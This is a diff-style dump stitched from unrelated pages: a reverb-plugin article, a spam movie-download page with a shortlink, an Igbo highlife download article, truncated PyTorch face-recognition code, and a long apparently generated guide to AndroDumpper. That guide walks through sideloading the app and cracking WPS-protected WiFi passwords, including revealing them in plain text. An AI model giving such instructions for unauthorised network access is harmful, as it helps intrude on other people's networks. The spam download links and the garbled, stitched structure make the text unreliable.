        Convolution reverb can produce very realistic and natural sounding reverbs, as well as creative and unique effects that are not possible with traditional reverb algorithms. It can also capture the character and nuances of vintage studio gear and real acoustic spaces, which can add warmth, depth, and dimension to your mixes.
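To make the idea concrete, here is a minimal Python sketch of what a convolution reverb does under the hood: it convolves a dry recording with an impulse response and mixes the result back in. The file names are placeholders, and this says nothing about Convology XT's internals; it only illustrates the general technique, assuming NumPy and SciPy are available and both WAV files are mono at the same sample rate.

```python
import numpy as np
from scipy.io import wavfile
from scipy.signal import fftconvolve

# Load a dry recording and an impulse response (placeholder file names).
rate_dry, dry = wavfile.read("dry_take.wav")
rate_ir, ir = wavfile.read("impulse_response.wav")
assert rate_dry == rate_ir, "resample one file so the sample rates match"

dry = dry.astype(np.float64)
ir = ir.astype(np.float64)

# Convolving the dry signal with the impulse response produces the "wet" reverb tail.
wet = fftconvolve(dry, ir)
wet /= np.max(np.abs(wet)) + 1e-12  # normalise to avoid clipping

# Simple 70/30 dry/wet mix; the dry part is zero-padded to the wet length.
dry_norm = dry / (np.max(np.abs(dry)) + 1e-12)
mix = np.concatenate([dry_norm, np.zeros(len(wet) - len(dry_norm))])
mix = 0.7 * mix + 0.3 * wet

wavfile.write("reverb_demo.wav", rate_dry, (mix * 32767).astype(np.int16))
```

A real-time convolution plugin performs essentially this computation continuously, which is why the quality of the impulse response matters so much.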

        - -

        How to Use Convology XT in Your DAW

        - -

        Convology XT is compatible with most DAWs that support audio plugins in VST2, VST3, AAX or AU formats. You can use it as an insert effect on individual tracks or buses, or as a send effect on an auxiliary channel. To use Convology XT in your DAW, follow these steps:

        -

        - -
          -
        1. Download and install Convology XT from Impulse Record's website. You will need to register with a serial number to activate the plugin. See this FAQ entry for more details.
        2. -
        3. Launch your DAW and create a new project or open an existing one.
        4. -
        5. Add Convology XT as an effect plugin on the track or bus that you want to process with reverb.
        6. -
        7. Open the plugin interface and select an IR from the factory library or load your own IR from the file browser.
        8. -
        9. Adjust the parameters of the plugin to suit your taste and needs. You can modify the IR with features such as stretch, decay time scaling, EQ, frequency-dependent decay time scaling, time reverse, and amplitude envelope. You can also add modulation, predelay, stereo width, and stereo 3D chorusing effects.
        10. -
        11. Mix the dry and wet signals with the mix knob and adjust the output level with the gain knob.
        12. -
        13. Enjoy the vintage reverb sound of Convology XT!
        14. -
        - -

        Conclusion

        - -

        Impulse Record Convology XT 1.0 VST2, VST3, AAX x86 x64 is a free convolution reverb plugin that offers a great way to add vintage reverb effects to your music production. It comes with a generous factory library of IRs sampled from vintage studio gear and real acoustic spaces, and it allows you to load your own IRs or purchase more IR libraries from Impulse Record. It also has many IR modification features and additional effects that let you customize your reverb sound. If you are looking for a free convolution reverb plugin that can deliver high-quality vintage reverb sounds, you should definitely give Convology XT a try!

        -

        How to Choose the Right IR Library for Your Music Style

        - -

        One of the advantages of Convology XT is that it gives you access to a huge library of IRs that cover various genres and styles of music. Whether you are making rock, pop, jazz, classical, or electronic music, you can find the right IR library for your needs. Here are some tips on how to choose the best IR library for your music style:

        - -
          -
        • If you are looking for vintage reverb effects that emulate the sound of classic studio gear from the 80s and 90s, you should check out the Convology XT Complete Library. This library contains IRs sampled from 126 different pieces of vintage studio gear from studios all over the world. You can find IRs from famous reverb DSP units, plates, springs, echo chambers, vintage amps, and more.
        • -
        • If you are looking for true stereo reverb effects that preserve the spatial information of the original sound source, you should check out the Convology XT True Stereo Library. This library contains 4-channel true stereo IRs that capture the sound of pro DSP units, plates, and springs. You can use these IRs to create realistic and immersive reverb effects that enhance the stereo image of your mix.
        • -
        • If you are looking for natural reverb effects that simulate the sound of real acoustic spaces, you should check out the Convology XT Real Spaces Library. This library contains acoustical recordings of real spaces such as arenas, stadiums, churches, halls, rooms, and more. You can use these IRs to create reverb effects that match the mood and atmosphere of your music.
        • -
        - -

        How to Get More Out of Convology XT with MlsTool

        - -

        If you are feeling adventurous and want to create your own IRs from your own hardware gear or acoustical spaces, you can use a free application called MlsTool. MlsTool is a tool that allows you to record impulse responses using a technique called maximum length sequence (MLS). MLS is a method that uses a special type of noise signal to excite a system and measure its response.

        - -

        To use MlsTool, you will need a computer with an audio interface, a microphone, a speaker or headphones, and a cable to connect them. You will also need to download MlsTool from Wave Arts' website. To record an impulse response using MlsTool, follow these steps:

        - -
          -
        1. Connect your microphone to your audio interface and place it in front of the system that you want to measure (such as a reverb unit or a room).
        2. -
        3. Connect your speaker or headphones to your audio interface and play back the MLS signal from MlsTool.
        4. -
        5. Record the output of your microphone with MlsTool.
        6. -
        7. Save the recorded file as a WAV or AIF file.
        8. -
        9. Load the file into Convology XT and enjoy your custom IR!
        10. -
        - -

        MlsTool is a powerful tool that lets you create your own IRs from any system that produces sound. You can use it to capture the sound of your favorite reverb units or acoustic spaces and use them in Convology XT. You can also experiment with different settings and locations to create unique and creative IRs.

        -

        How to Compare Convology XT with Other Convolution Reverb Plugins

        - -

        There are many convolution reverb plugins available on the market, but not all of them are created equal. Some of them may have more features, more IRs, or better sound quality than others. How can you compare Convology XT with other convolution reverb plugins and decide which one is best for you? Here are some factors to consider:

        - -
          -
        • The size and quality of the IR library. Convology XT has one of the largest and most comprehensive IR libraries among convolution reverb plugins, with over 2,900 IRs sampled from vintage studio gear and real acoustic spaces. The IRs are also recorded in high resolution (96 kHz/24 bit) and processed with minimal noise and artifacts.
        • -
        • The ease of use and user interface. Convology XT has a simple and intuitive user interface that lets you quickly browse through the IR library and audition them on the fly. You can also easily modify the IRs with various parameters and effects. The plugin also has a sophisticated UI that displays a real time spectrum, an IR time display, and images of the vintage gear and real spaces.
        • -
        • The CPU efficiency and latency. Convology XT is a CPU efficient plugin that does not consume too much processing power or memory. It also has low latency and zero latency modes that allow you to use it without any noticeable delay or lag.
        • -
        • The price and value. Convology XT is a free plugin that offers a lot of value for no cost. You can use it without any time limitations, iLok, or frustrating unlocking hoops. You can also purchase additional IR libraries from Impulse Record at affordable prices, or use your own IRs from other sources.
        • -
        - -

        Based on these factors, Convology XT is one of the best convolution reverb plugins on the market. It offers a great combination of sound quality, features, ease of use, CPU efficiency, and value. It is a plugin that can satisfy both beginners and professionals alike.

        - -

        How to Get Support and Updates for Convology XT

        - -

        If you have any questions or issues with Convology XT, you can get support and updates from Impulse Record and Wave Arts. Here are some ways to contact them:

        - - - -

        Impulse Record and Wave Arts are committed to providing high-quality products and services to their customers. They are always working on improving Convology XT and adding more IR libraries to their collection. They also appreciate any feedback and suggestions from their users.

        -

        Conclusion

        - -

        Impulse Record Convology XT 1.0 VST2, VST3, AAX x86 x64 is a free convolution reverb plugin that can add vintage reverb effects to your music production. It comes with a large and diverse library of IRs sampled from vintage studio gear and real acoustic spaces, and it allows you to load your own IRs or purchase more IR libraries from Impulse Record. It also has many IR modification features and additional effects that let you customize your reverb sound. It is easy to use, CPU efficient, and compatible with most DAWs. It is a plugin that can satisfy both beginners and professionals who are looking for high-quality vintage reverb sounds. If you are interested in trying out Convology XT, you can download it for free from Impulse Record's website and register with a serial number. You can also contact Impulse Record and Wave Arts for support and updates. Convology XT is a plugin that can enhance your music production with the sound of vintage reverb.

        -
        -
        \ No newline at end of file diff --git a/spaces/falterWliame/Face_Mask_Detection/Ip Man 2 Full Movie In English Free Download TOP.md b/spaces/falterWliame/Face_Mask_Detection/Ip Man 2 Full Movie In English Free Download TOP.md deleted file mode 100644 index 7e176709a73795d226a49b69f5afafa3932fc301..0000000000000000000000000000000000000000 --- a/spaces/falterWliame/Face_Mask_Detection/Ip Man 2 Full Movie In English Free Download TOP.md +++ /dev/null @@ -1,6 +0,0 @@ -

        ip man 2 full movie in english free download


        Download File →→→ https://urlca.com/2uDd42



        - -ip man Tamil dubbed movie download | ip man2 | ip man3 | ip man4 movie ... Full Movie 2020 | TONY JAA | Exclusive Tamil Movie 2020 | English Subtitle | HD. 1fdad05405
        -
        -
        -

        diff --git a/spaces/fatiXbelha/sd/AndroDumpper 6.0.1 The Best App for Testing and Breaking WiFi Networks.md b/spaces/fatiXbelha/sd/AndroDumpper 6.0.1 The Best App for Testing and Breaking WiFi Networks.md deleted file mode 100644 index 4c1cc0f09e68ec0732e901a749bedc15b5cd169b..0000000000000000000000000000000000000000 --- a/spaces/fatiXbelha/sd/AndroDumpper 6.0.1 The Best App for Testing and Breaking WiFi Networks.md +++ /dev/null @@ -1,176 +0,0 @@ -
        -

        AndroDumpper 6.0.1 Download: How to Hack WiFi Passwords with Your Android Device

        -

        Have you ever wanted to access a WiFi network without knowing its password? Maybe you are in a public place with limited data or you just want to test the security of your own network. Whatever the reason, there is an app that can help you do that: AndroDumpper.

        -

        AndroDumpper is an Android app that can crack WiFi passwords using a vulnerability in the WPS (WiFi Protected Setup) protocol. It is a legal app that was initially designed for network auditing, but it can also be used for malicious purposes.

        -

        androdumpper 6.0.1 download


        Download Zip ✑ ✑ ✑ https://urllie.com/2uNvMS



        -

        In this article, we will show you how to download and install AndroDumpper 6.0.1 on your Android device, how to use it to hack WiFi passwords, and what are the advantages and disadvantages of using it.

        -

        What is AndroDumpper and how does it work?

        -

        AndroDumpper is an Android app that can crack WiFi passwords using WPS vulnerability

        -

        WPS is a feature that allows users to connect to a WiFi network by pressing a button on the router or entering a PIN code. However, this feature also has a flaw that makes it vulnerable to brute-force attacks.

        -

        AndroDumpper is an app that exploits this flaw by trying different algorithms or passwords to connect to a WPS-enabled WiFi network. It does not require the user to know the SSID (network name) or the password of the network.

        -

        AndroDumpper has two methods to connect to WiFi networks: root and no root

        -

        AndroDumpper offers two ways to connect to WiFi networks depending on whether your device is rooted or not.

        -

        Root method: This method works for rooted devices and is compatible with any Android version. It allows you to connect directly to the network and show the password in plain text.

        -

        No root method: This method works for non-rooted devices that run Android 5.0 or above. It does not show the password, but it allows you to connect using a proxy server.

        -


        -

        AndroDumpper also provides a dictionary of common passwords for brute-force attacks

        -

        In addition to using WPS vulnerability, AndroDumpper also has a dictionary of common passwords that can be used for brute-force attacks on weak security systems.

        -

        The dictionary is stored in a file uploaded by the developer on Google Drive and can be downloaded by the user from the app. The dictionary contains more than 500,000 passwords that can be used to try to guess the network password.

        -

        How to download and install AndroDumpper 6.0.1 on your Android device?

        -

        You can download AndroDumpper 6.0.1 APK from various sources online

        -

        AndroDumpper 6.0.1 is not available on the Google Play Store, so you need to download it from other sources online. You can search for AndroDumpper 6.0.1 APK on Google or use one of the following links:

        - -

        Make sure you download the APK file from a trusted and secure source to avoid malware or viruses.

        -

        You need to enable unknown sources in your device settings to install AndroDumpper 6.0.1 APK

        -

        Before you can install AndroDumpper 6.0.1 APK on your device, you need to enable unknown sources in your device settings. This will allow you to install apps from sources other than the Google Play Store.

        -

        To enable unknown sources, follow these steps:

        -
          -
        1. Go to your device settings and tap on Security or Privacy.
        2. -
        3. Find the option that says Unknown sources or Install unknown apps and toggle it on.
        4. -
        5. A warning message will appear, telling you that installing apps from unknown sources can harm your device. Tap on OK or Allow to proceed.
        6. -
        -

        You can now install AndroDumpper 6.0.1 APK on your device.

        -

        You need to grant AndroDumpper 6.0.1 the necessary permissions to access WiFi networks

        -

        After you install AndroDumpper 6.0.1 APK on your device, you need to grant it the necessary permissions to access WiFi networks and other features.

        -

        To grant permissions, follow these steps:

        -
          -
        1. Open AndroDumpper 6.0.1 app and tap on Allow or Accept when prompted.
        2. -
        3. The app will ask for various permissions, such as Location, Storage, Phone, and Camera. Tap on Allow or Accept for each permission.
        4. -
        5. If you are using the root method, the app will also ask for root access. Tap on Grant or Confirm when prompted.
        6. -
        -

        You can now use AndroDumpper 6.0.1 app to hack WiFi passwords.

        -

        How to use AndroDumpper 6.0.1 to hack WiFi passwords?

        -

        You need to scan for available WiFi networks with WPS enabled

        -

        The first step to use AndroDumpper 6.0.1 app to hack WiFi passwords is to scan for available WiFi networks with WPS enabled.

        -

        To scan for WiFi networks, follow these steps:

        -
          -
        1. Open AndroDumpper 6.0.1 app and tap on the Scan button at the top right corner.
        2. -
        3. The app will scan for nearby WiFi networks and display them in a list.
        4. -
        5. The networks with WPS enabled will have a green icon next to them, while the ones without WPS will have a red icon.
        6. -
        7. You can also filter the networks by tapping on the Filter button at the bottom right corner and selecting WPS Only or All Networks.
        8. -
        -

        You can now select a network to hack its password.

        -

        You need to select a network and choose a method to connect: root or no root

        -

        The next step is to select a network and choose a method to connect: root or no root.

        -

        To select a network and choose a method, follow these steps:

        -
          -
        1. Tap on the network you want to hack and a pop-up window will appear.
        2. -
        3. The window will show you the network name, signal strength, security type, and MAC address.
        4. -
        5. At the bottom of the window, you will see two buttons: Try With and Custom PIN.
        6. -
        7. If you are using the root method, tap on Try With and select Root Method from the menu.
        8. If you are using the no root method, tap on Try With and select No Root Method from the menu.
        9. -
        10. If you want to use a custom PIN, tap on Custom PIN and enter the PIN you want to try.
        11. -
        -

        The app will then try to connect to the network using the method or PIN you selected.

        -

        You need to wait for AndroDumpper 6.0.1 to try different algorithms or passwords to connect

        -

        The next step is to wait for AndroDumpper 6.0.1 to try different algorithms or passwords to connect to the network.

        -

        To wait for the connection, follow these steps:

        -
          -
        1. A progress bar will appear at the bottom of the screen, showing you the status of the connection attempt.
        2. -
        3. The app will try different algorithms or passwords based on the network security type and WPS version.
        4. -
        5. The app will also show you the number of tries and the time elapsed.
        6. -
        7. If the connection is successful, a green message will appear, saying "Connected Successfully".
        8. -
        9. If the connection fails, a red message will appear, saying "Failed to Connect".
        10. -
        -

        You can now check if the connection is successful or not.

        -

        You need to check if the connection is successful or not

        -

        The final step is to check if the connection is successful or not.

        -

        To check the connection, follow these steps:

        -
          -
        1. If the connection is successful, you can tap on View Password to see the network password in plain text (root method only).
        2. -
        3. You can also tap on Copy Password to copy the password to your clipboard (root method only).
        4. -
        5. You can also tap on Connect Network to connect your device to the network using a proxy server (no root method only).
        6. -
        7. If the connection fails, you can tap on Try Again to retry the connection with a different algorithm or password.
        8. -
        9. You can also tap on Cancel to stop the connection attempt and return to the network list.
        10. -
        -

        You have now hacked a WiFi password using AndroDumpper 6.0.1 app.

        -

        What are the advantages and disadvantages of using AndroDumpper 6.0.1?

        -

        Advantages: easy to use, free, fast, and effective

        -

        AndroDumpper 6.0.1 has some advantages that make it a popular app for hacking WiFi passwords. Some of these advantages are:

        -
          -
        • It is easy to use: You just need to scan for networks, select a method, and wait for the connection.
        • -
        • It is free: You do not need to pay anything to download or use the app.
        • -
        • It is fast: You can hack a WiFi password in a matter of seconds or minutes depending on the network security and WPS version.
        • -
        • It is effective: You can hack most WiFi networks with WPS enabled using this app.
        • -
        -

        Disadvantages: illegal, unethical, risky, and full of ads

        -

        However, AndroDumpper 6.0.1 also has some disadvantages that make it a risky and unethical app for hacking WiFi passwords. Some of these disadvantages are:

        -
          -
        • It is illegal: Hacking WiFi passwords without permission is a crime in many countries and can lead to legal consequences.
        • -
        • It is unethical: Hacking WiFi passwords without permission is a violation of privacy and security of other people and can cause them harm or loss.
        • -
        • It is risky: Hacking WiFi passwords without permission can expose you to malware or viruses that may infect your device or steal your data.
        • -
        • It is full of ads: The app has many annoying ads that pop up frequently and interfere with your user experience.
        • -
        -

        Conclusion

        -

        AndroDumpper 6.0.1 is an Android app that can hack WiFi passwords using WPS vulnerability. It has two methods to connect to WiFi networks: root and no root. It also has a dictionary of common passwords for brute-force attacks. It is easy to download and install on your device, but you need to enable unknown sources and grant permissions. It is easy to use, but you need to scan for networks, select a method, wait for the connection, and check the result. It has some advantages such as being free, fast, and effective, but it also has some disadvantages such as being illegal, unethical, risky, and full of ads. Therefore, you should use this app with caution and responsibility.

        -

        Frequently Asked Questions

        -

        Q: A: What is WPS and why is it vulnerable?

        -

        WPS stands for WiFi Protected Setup and it is a feature that allows users to connect to a WiFi network by pressing a button on the router or entering a PIN code. However, this feature also has a vulnerability that makes it susceptible to brute-force attacks. A brute-force attack is when an attacker tries different combinations of numbers or letters to guess the correct password or PIN. WPS has a flaw that allows an attacker to try only 11,000 possible PINs instead of 10 million, which makes it easier to crack.

        -

        Q: How can I protect my WiFi network from AndroDumpper and other hacking apps?

        -

        There are some steps you can take to protect your WiFi network from AndroDumpper and other hacking apps. Some of these steps are:

        -
          -
        • Disable WPS on your router: You can disable WPS on your router by logging into your router settings and turning off the WPS option. This will prevent AndroDumpper and other apps from exploiting the WPS vulnerability.
        • -
        • Use a strong password: You can use a strong password for your WiFi network that is not easy to guess or crack. You can use a combination of uppercase and lowercase letters, numbers, and symbols. You can also use a passphrase that is a sentence or a phrase that you can remember easily.
        • -
        • Change your password regularly: You can change your password regularly to prevent anyone from accessing your network if they have hacked your password before. You can change your password every few months or whenever you suspect a breach.
        • -
        • Use encryption: You can use encryption for your WiFi network that scrambles the data that is transmitted over the network. You can use WPA2 or WPA3 encryption, which are the most secure encryption standards available.
        • -
        -

        Q: Is AndroDumpper legal and safe to use?

        -

        AndroDumpper is legal and safe to use only for network auditing purposes. Network auditing is when you test the security of your own network or a network that you have permission to access. However, if you use AndroDumpper for hacking WiFi passwords without permission, it is illegal and unsafe. Hacking WiFi passwords without permission is a crime in many countries and can lead to legal consequences. It is also unethical and immoral, as it violates the privacy and security of other people and can cause them harm or loss. Moreover, it is risky, as it can expose you to malware or viruses that may infect your device or steal your data.

        -

        Q: What are some alternatives to AndroDumpper for hacking WiFi passwords?

        -

        If you are looking for some alternatives to AndroDumpper for hacking WiFi passwords, you can try some of these apps:

        -
          -
        • WPS Connect: This app also exploits the WPS vulnerability and allows you to connect to WiFi networks with WPS enabled. It has a simple interface and shows you the network password in plain text.
        • -
        • WiFi Warden: This app also exploits the WPS vulnerability and allows you to connect to WiFi networks with WPS enabled. It has more features than AndroDumpper, such as generating strong passwords, analyzing WiFi networks, and creating QR codes.
        • -
        • WiFi Master Key: This app does not exploit the WPS vulnerability, but it allows you to connect to WiFi networks that are shared by other users. It has a large database of WiFi networks and passwords that are updated regularly.
        • -
        -

        Q: How can I contact the developer of AndroDumpper if I have any questions or feedback?

        -

        If you have any questions or feedback about AndroDumpper, you can contact the developer by using one of these methods:

        -
          -
        • Email: You can send an email to the developer at osamah.alhen@gmail.com
        • -
        • Facebook: You can follow the developer on Facebook at https://www.facebook.com/osama.abu.kmail
        • -
        • Twitter: You can follow the developer on Twitter at https://twitter.com/osamaabukmail
        • -

        401be4b1e0
        -
        -
        \ No newline at end of file diff --git a/spaces/fatiXbelha/sd/Enjoy Oge Chi Di Nma by Okey Jakota and Mayor Band of Nigeria - The Ultimate Igbo Highlife Playlist (Download Available).md b/spaces/fatiXbelha/sd/Enjoy Oge Chi Di Nma by Okey Jakota and Mayor Band of Nigeria - The Ultimate Igbo Highlife Playlist (Download Available).md deleted file mode 100644 index 732e38639386889331c1144f23d4f8e9048b740e..0000000000000000000000000000000000000000 --- a/spaces/fatiXbelha/sd/Enjoy Oge Chi Di Nma by Okey Jakota and Mayor Band of Nigeria - The Ultimate Igbo Highlife Playlist (Download Available).md +++ /dev/null @@ -1,92 +0,0 @@ -
        -

        Okey Jakota Oge Chi Di Nma Download: A Guide to Igbo Highlife Music

        -

        If you are a fan of African music, you may have heard of Igbo highlife music, a genre that combines traditional Igbo folk music with modern influences such as jazz, blues, and soul. Igbo highlife music is one of the most popular and influential forms of music in Nigeria, especially in the southeastern region where the Igbo people live. One of the artists who has contributed to the development and popularity of Igbo highlife music is Okey Jakota, whose song Oge Chi Di Nma (The Time God Says It Is Good) is a classic example of this genre. In this article, we will explore what Igbo highlife music is, who Okey Jakota is, and how to download his song Oge Chi Di Nma.

        -

        What is Igbo highlife music?

        -

        Igbo highlife music is a style of music that originated in the early 20th century among the Igbo people of southeastern Nigeria. It is a fusion of traditional Igbo folk music, which uses instruments such as drums, flutes, rattles, and xylophones, and modern influences such as jazz, blues, and soul, which use instruments such as guitars, saxophones, trumpets, and keyboards. Igbo highlife music is characterized by its upbeat tempo, melodic vocals, complex rhythms, and social commentary.

        -

        okey jakota oge chi di nma download


        DOWNLOADhttps://urllie.com/2uNFHo



        -

        The origin and history of Igbo highlife music

        -

        The origin of Igbo highlife music can be traced back to the colonial era, when Nigerian musicians were exposed to Western music through radio broadcasts, gramophone records, and live performances by visiting bands. Some of the early pioneers of Igbo highlife music were musicians such as E.T. Mensah from Ghana, Bobby Benson from Lagos, and Stephen Osita Osadebe from Onitsha. They adapted the highlife style that was popular in West Africa at the time, which was a blend of Ghanaian palm-wine music and jazz, to suit their local tastes and contexts. They incorporated elements from their native Igbo culture, such as proverbs, idioms, folktales, and religious beliefs, into their lyrics and melodies. They also used their music as a medium to express their opinions on social issues such as colonialism, nationalism, corruption, morality, and love.

        -

        The characteristics and features of Igbo highlife music

        -

        Igbo highlife music has several distinctive characteristics and features that make it unique and appealing. Some of these are:

        -
          -
        • The use of call-and-response patterns between the lead singer and the chorus or the audience.
        • -
        • The use of repetition and variation to create musical tension and release.
        • -
        • The use of syncopation and polyrhythm to create complex and dynamic beats.
        • -
        • The use of pentatonic scales and modes to create melodic harmony.
        • -
        • The use of brass instruments such as saxophones and trumpets to create bright and loud sounds.
        • -
        • The use of electric guitars to create rhythmic accompaniment and solo improvisation.
        • -
        • The use of keyboards to create rich chords and fillers.
        • -
        • The use of bass guitars to create low-pitched grooves.
        • -
        • The use of drums and other percussion instruments to provide the underlying rhythmic foundation.

          How to download Okey Jakota Oge Chi Di Nma and other Igbo highlife songs?

          -

          If you want to enjoy Okey Jakota Oge Chi Di Nma and other Igbo highlife songs on your device, you may want to download them from the internet. However, before you do that, you should be aware of the legal and ethical issues of downloading music online. You should also know the best websites and platforms to download Igbo highlife music. And finally, you should follow the steps and tips to download Okey Jakota Oge Chi Di Nma safely and easily.

          -

          The legal and ethical issues of downloading Igbo highlife music

          -

          Downloading music online is not always legal or ethical. It may violate the intellectual property rights of the artists and the record labels who own the music. It may also deprive them of their rightful income and recognition. Therefore, before you download any Igbo highlife music online, you should make sure that you have the permission of the owners or that the music is in the public domain or under a creative commons license. You should also respect the culture and values of the Igbo people and their music. You should not use their music for any inappropriate or offensive purposes. You should also give credit to the artists and the sources of the music whenever you use it.

          -

          The best websites and platforms to download Igbo highlife music

          -

          There are many websites and platforms that offer Igbo highlife music for download. However, not all of them are reliable, safe, or legal. Some of them may contain viruses, malware, or spyware that can harm your device or compromise your privacy. Some of them may also have low-quality or fake files that can ruin your listening experience. Therefore, you should be careful and selective when choosing where to download Igbo highlife music online. Some of the best websites and platforms that we recommend are:

          -
            -
          • NaijaLoaded: This is one of the most popular and trusted websites for downloading Nigerian music of all genres, including Igbo highlife music. It has a large and updated collection of songs by various artists, such as Okey Jakota, Oliver De Coque, Bright Chimezie, Ali Chukwuma, Onyenze Nwa Amobi, and many more. It also has a user-friendly interface and a fast download speed. You can visit the website at .
          • -
          • Igbo Highlife Music App: This is a mobile app that allows you to stream and download Igbo highlife music on your phone or tablet. It has a huge and diverse library of songs by different artists, such as Chief Stephen Osita Osadebe, Sir Warrior, Prince Nico Mbarga, Flavour N'abania, Phyno, Zoro, and many more. It also has a simple and elegant design and a smooth performance. You can download the app from Google Play Store at .
          • -
          • YouTube: This is a well-known and widely used platform for watching and downloading videos of all kinds, including Igbo highlife music videos. It has a vast and varied selection of songs by various artists, such as Umu Obiligbo, Chijioke Mbanefo, Ayaka Ozubulu, Ogene Boys, Oriental Brothers, and many more. It also has a high-quality and easy-to-use interface and a flexible download option. You can visit the website at or download the app from Google Play Store or Apple App Store.
          • -
          -

          The steps and tips to download Okey Jakota Oge Chi Di Nma

          -

          To download Okey Jakota Oge Chi Di Nma from any of the websites or platforms mentioned above, you can follow these general steps:

          -
            -
          1. Go to the website or platform of your choice.
          2. -
          3. Search for Okey Jakota Oge Chi Di Nma or browse through the categories or playlists.
          4. -
          5. Select the song from the results or suggestions.
          6. -
          7. Click on the download button or icon.
          8. -
          9. Choose the format and quality of the file.
          10. -
          11. Save the file to your device or cloud storage.
          12. -
          13. Enjoy listening to Okey Jakota Oge Chi Di Nma.
          14. -
          -

          Here are some tips to make your downloading process easier and better:

          -
            -
          • Make sure you have a stable internet connection and enough storage space on your device or cloud service.
          • -
          • Use a reputable antivirus software or app to scan the file before opening it.
          • -
          • Use a good media player or app to play the file.
          • -
          • Delete or backup the file after listening to it if you don't need it anymore.
          • -
          • Share the file with your friends and family if you like it.
          • -
          -

          Conclusion

          -

          Okey Jakota Oge Chi Di Nma is a wonderful song that showcases the beauty and richness of Igbo highlife music. It is a song that celebrates God's goodness and timing in our lives. It is also a song that inspires us to be grateful and happy. If you want to download this song and other Igbo highlife songs, you can use any of the websites or platforms that we have recommended in this article. However, you should also be mindful of the legal and ethical issues of downloading music online. You should respect the rights and culture of the artists and the Igbo people. You should also enjoy the music responsibly and share it with others.

          -

          Okey Jakota Oge Chi Di Nma lyrics
          -Oge Chi Di Nma by Okey Jakota mp3
          -Okey Jakota feat. Mayor Band of Nigeria
          -Oge Chi Di Nma song meaning
          -Okey Jakota World Music genre
          -Oge Chi Di Nma SoundCloud stream
          -Okey Jakota latest songs 2023
          -Oge Chi Di Nma Shazam track
          -Okey Jakota Nigerian artist biography
          -Oge Chi Di Nma video download
          -Okey Jakota Igbo music style
          -Oge Chi Di Nma translation in English
          -Okey Jakota best albums and singles
          -Oge Chi Di Nma remix version
          -Okey Jakota concert tickets and tour dates
          -Oge Chi Di Nma instrumental download
          -Okey Jakota fan club and social media
          -Oge Chi Di Nma cover art and design
          -Okey Jakota awards and nominations
          -Oge Chi Di Nma reviews and ratings
          -Okey Jakota collaborations and features
          -Oge Chi Di Nma guitar chords and tabs
          -Okey Jakota merchandise and memorabilia
          -Oge Chi Di Nma ringtone and notification sound
          -Okey Jakota net worth and income sources
          -Oge Chi Di Nma playlist and radio stations
          -Okey Jakota influences and inspirations
          -Oge Chi Di Nma background story and history
          -Okey Jakota interviews and podcasts
          -Oge Chi Di Nma live performance and recording

          -

          FAQs

          -

          Here are some frequently asked questions about Okey Jakota Oge Chi Di Nma and Igbo highlife music:

          -
            -
          1. What does Oge Chi Di Nma mean in English?
            Oge Chi Di Nma is an Igbo phrase that means The Time God Says It Is Good. It is a song title by Okey Jakota, a Nigerian highlife musician.
          2. -
          3. What is the difference between Igbo highlife music and other types of highlife music?
            Igbo highlife music is a style of highlife music that originated among the Igbo people of southeastern Nigeria. It is a fusion of traditional Igbo folk music and modern influences such as jazz, blues, and soul. It differs from other types of highlife music in its use of Igbo language, proverbs, idioms, folktales, and religious beliefs in its lyrics and melodies.
          4. -
          5. Who are some of the best Igbo highlife musicians?
            Some of the best Igbo highlife musicians are Chief Stephen Osita Osadebe, Oliver De Coque, Bright Chimezie, Ali Chukwuma, Onyenze Nwa Amobi, Umu Obiligbo, Chijioke Mbanefo, Ayaka Ozubulu, Ogene Boys, Oriental Brothers, Flavour N'abania, Phyno, Zoro, and many more.
          6. -
          7. Where can I listen to Igbo highlife music online?
            You can listen to Igbo highlife music online on various websites and platforms such as NaijaLoaded, Igbo Highlife Music App, YouTube, Spotify, Apple Music, SoundCloud, Audiomack, Boomplay, and many more.
          8. -
          9. How can I learn more about Igbo highlife music and culture?
            You can learn more about Igbo highlife music and culture by reading books, articles, blogs, magazines, newspapers, and journals on the topic. You can also watch documentaries, movies, shows, interviews, and videos on the topic. You can also visit museums, galleries, festivals, events, and places related to the topic. You can also talk to experts, scholars, artists, fans, and people who are knowledgeable about the topic.
          10. -

          401be4b1e0
          -
          -
          \ No newline at end of file diff --git a/spaces/fb700/chatglm-fitness-RLHF/src/face3d/models/arcface_torch/backbones/iresnet2060.py b/spaces/fb700/chatglm-fitness-RLHF/src/face3d/models/arcface_torch/backbones/iresnet2060.py deleted file mode 100644 index 21d1122144d207637d2444cba1f68fe630c89f31..0000000000000000000000000000000000000000 --- a/spaces/fb700/chatglm-fitness-RLHF/src/face3d/models/arcface_torch/backbones/iresnet2060.py +++ /dev/null @@ -1,176 +0,0 @@ -import torch -from torch import nn - -assert torch.__version__ >= "1.8.1" -from torch.utils.checkpoint import checkpoint_sequential - -__all__ = ['iresnet2060'] - - -def conv3x3(in_planes, out_planes, stride=1, groups=1, dilation=1): - """3x3 convolution with padding""" - return nn.Conv2d(in_planes, - out_planes, - kernel_size=3, - stride=stride, - padding=dilation, - groups=groups, - bias=False, - dilation=dilation) - - -def conv1x1(in_planes, out_planes, stride=1): - """1x1 convolution""" - return nn.Conv2d(in_planes, - out_planes, - kernel_size=1, - stride=stride, - bias=False) - - -class IBasicBlock(nn.Module): - expansion = 1 - - def __init__(self, inplanes, planes, stride=1, downsample=None, - groups=1, base_width=64, dilation=1): - super(IBasicBlock, self).__init__() - if groups != 1 or base_width != 64: - raise ValueError('BasicBlock only supports groups=1 and base_width=64') - if dilation > 1: - raise NotImplementedError("Dilation > 1 not supported in BasicBlock") - self.bn1 = nn.BatchNorm2d(inplanes, eps=1e-05, ) - self.conv1 = conv3x3(inplanes, planes) - self.bn2 = nn.BatchNorm2d(planes, eps=1e-05, ) - self.prelu = nn.PReLU(planes) - self.conv2 = conv3x3(planes, planes, stride) - self.bn3 = nn.BatchNorm2d(planes, eps=1e-05, ) - self.downsample = downsample - self.stride = stride - - def forward(self, x): - identity = x - out = self.bn1(x) - out = self.conv1(out) - out = self.bn2(out) - out = self.prelu(out) - out = self.conv2(out) - out = self.bn3(out) - if self.downsample is not None: - identity = self.downsample(x) - out += identity - return out - - -class IResNet(nn.Module): - fc_scale = 7 * 7 - - def __init__(self, - block, layers, dropout=0, num_features=512, zero_init_residual=False, - groups=1, width_per_group=64, replace_stride_with_dilation=None, fp16=False): - super(IResNet, self).__init__() - self.fp16 = fp16 - self.inplanes = 64 - self.dilation = 1 - if replace_stride_with_dilation is None: - replace_stride_with_dilation = [False, False, False] - if len(replace_stride_with_dilation) != 3: - raise ValueError("replace_stride_with_dilation should be None " - "or a 3-element tuple, got {}".format(replace_stride_with_dilation)) - self.groups = groups - self.base_width = 